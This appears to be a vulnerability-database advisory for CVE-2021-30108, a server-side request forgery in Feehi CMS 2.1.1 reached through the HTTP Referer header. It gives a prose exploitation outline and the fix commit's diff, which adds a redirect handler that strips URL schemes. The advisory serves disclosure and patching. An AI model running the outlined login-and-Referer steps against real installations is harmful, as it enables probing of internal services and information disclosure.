VYPR
← All advisories
Critical severityNVD Advisory· Published May 24, 2021· Updated Aug 3, 2024

CVE-2021-30108

CVE-2021-30108

Description

Feehi CMS 2.1.1 is affected by a Server-side request forgery (SSRF) vulnerability. When the user modifies the HTTP Referer header to any url, the server can make a request to it.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Feehi CMS 2.1.1 is vulnerable to server-side request forgery (SSRF) via the HTTP Referer header, allowing an attacker to make the server send requests to arbitrary URLs.

Vulnerability

Feehi CMS version 2.1.1 is affected by a server-side request forgery (SSRF) vulnerability that can be triggered by modifying the HTTP Referer header to an arbitrary URL [1][3]. The application does not properly validate the Referer header value during redirects after login, leading to an SSRF condition. The vulnerability exists in the login flow where the server follows the Referer header as a redirect target.

Exploitation

An attacker must first register an account and then log out. The attacker then sends a GET request to the login page with a modified HTTP Referer header pointing to an attacker-controlled URL (e.g., a Burp Collaborator domain). After that, the attacker submits a POST login request with valid credentials. The server processes the login and, based on the Referer header, makes a request to the attacker's URL [3].

Impact

Successful exploitation allows an attacker to force the server to send HTTP requests to arbitrary internal or external URLs. This SSRF can be used to probe internal services, read local files (via file:// protocol), or achieve network mapping. The vulnerability could lead to information disclosure or further compromise of internal systems [1][3].

Mitigation

A fix has been committed to the Feehi CMS repository (commit d45cb9c) that modifies the redirect behavior to prevent open redirects and SSRF [2]. The fix involves validating that the redirect URL does not contain a scheme and using a relative URL instead. Users should update to a version that includes this commit. No official patched release has been announced, but the commit provides the necessary code changes.

References
  1. NVD - CVE-2021-30108
  2. fix: host header inject · liufee/cms@d45cb9c
  3. SSRF vulnerability in feehicms v2.1.1

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

PackageAffected versionsPatched versions
feehi/cmsPackagist
<= 2.1.1

Affected products

2

Patches

1
d45cb9cb26d6

fix: host header inject

https://github.com/liufee/cmsliufeeAug 29, 2022via ghsa
commit
6 files changed · +63 6
  • common/components/Response.php+50 0 added
    @@ -0,0 +1,50 @@
+<?php
+
+namespace common\components;
+
+use Yii;
+use yii\helpers\Url;
+
+class Response extends \yii\web\Response
+{
+    public function redirect($url, $statusCode = 302, $checkAjax = true)
+    {
+        if (is_array($url) && isset($url[0])) {
+            // ensure the route is absolute
+            $url[0] = '/' . ltrim($url[0], '/');
+        }
+        $request = Yii::$app->getRequest();
+        $url = Url::to($url);
+        if(  strpos($url, "://") !== false ){
+            $newURL = "";
+            $array = parse_url(Yii::$app->getUser()->getReturnUrl());
+            isset($array['path']) && $newURL .= $array['path'];
+            isset($array['query']) && $newURL .= "?" . $array['query'];
+            if ($newURL == ""){
+                $url = "/";
+            }else{
+                $url = $newURL;
+            }
+        }
+        if ($checkAjax) {
+            if ($request->getIsAjax()) {
+                if (in_array($statusCode, [301, 302]) && preg_match('/Trident\/|MSIE[ ]/', (string)$request->userAgent)) {
+                    $statusCode = 200;
+                }
+                if ($request->getIsPjax()) {
+                    $this->getHeaders()->set('X-Pjax-Url', $url);
+                } else {
+                    $this->getHeaders()->set('X-Redirect', $url);
+                }
+            } else {
+                $this->getHeaders()->set('Location', $url);
+            }
+        } else {
+            $this->getHeaders()->set('Location', $url);
+        }
+
+        $this->setStatusCode($statusCode);
+
+        return $this;
+    }
+}
\ No newline at end of file
  • common/config/main.php+3 0 modified
    @@ -31,6 +31,9 @@
             'password' => '',
             'charset' => '',
         ],
+        'response' => [
+            'class' => common\components\Response::className(),
+        ],
         'cdn' => [//support Qiniu(七牛) TencentCloud(腾讯云) Aliyun(阿里云) Netease(网易云) more detail for visit http://doc.feehi.com/cdn.html
             'class' => feehi\cdn\DummyTarget::className(),//DummyTarget will not use and cdn
         ],
  • common/mail/backend/passwordResetToken-html.php+3 2 modified
    @@ -1,10 +1,11 @@
 <?php
 use yii\helpers\Html;
+use common\helpers\Util;
 
 /* @var $this yii\web\View */
-/* @var $user backend\models\AdminUser */
+/* @var $user common\models\AdminUser */
 
-$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['admin-user/reset-password', 'token' => $user->password_reset_token]);
+$resetLink = Util::assembleAbsoluteURL(['admin-user/reset-password', 'token' => $user->password_reset_token]);
 ?>
 <div class="password-reset">
     <p>Hello <?= Html::encode($user->username) ?>,</p>
  • common/mail/backend/passwordResetToken-text.php+3 2 modified
    @@ -1,9 +1,10 @@
 <?php
+use common\helpers\Util;
 
 /* @var $this yii\web\View */
-/* @var $user backend\models\AdminUser */
+/* @var $user common\models\AdminUser */
 
-$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['admin-user/reset-password', 'token' => $user->password_reset_token]);
+$resetLink = Util::assembleAbsoluteURL(['admin-user/reset-password', 'token' => $user->password_reset_token]);
 ?>
 Hello <?= $user->username ?>,
  • common/mail/passwordResetToken-html.php+2 1 modified
    @@ -1,10 +1,11 @@
 <?php
 use yii\helpers\Html;
+use common\helpers\Util;
 
 /* @var $this yii\web\View */
 /* @var $user common\models\User */
 
-$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['site/reset-password', 'token' => $user->password_reset_token]);
+$resetLink = Util::assembleAbsoluteURL(['site/reset-password', 'token' => $user->password_reset_token]);
 ?>
 <div class="password-reset">
     <p>Hello <?= Html::encode($user->username) ?>,</p>
  • common/mail/passwordResetToken-text.php+2 1 modified
    @@ -1,9 +1,10 @@
 <?php
+use common\helpers\Util;
 
 /* @var $this yii\web\View */
 /* @var $user common\models\User */
 
-$resetLink = Yii::$app->urlManager->createAbsoluteUrl(['site/reset-password', 'token' => $user->password_reset_token]);
+$resetLink = Util::assembleAbsoluteURL(['site/reset-password', 'token' => $user->password_reset_token]);
 ?>
 Hello <?= $user->username ?>,

Vulnerability mechanics

Generated on May 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.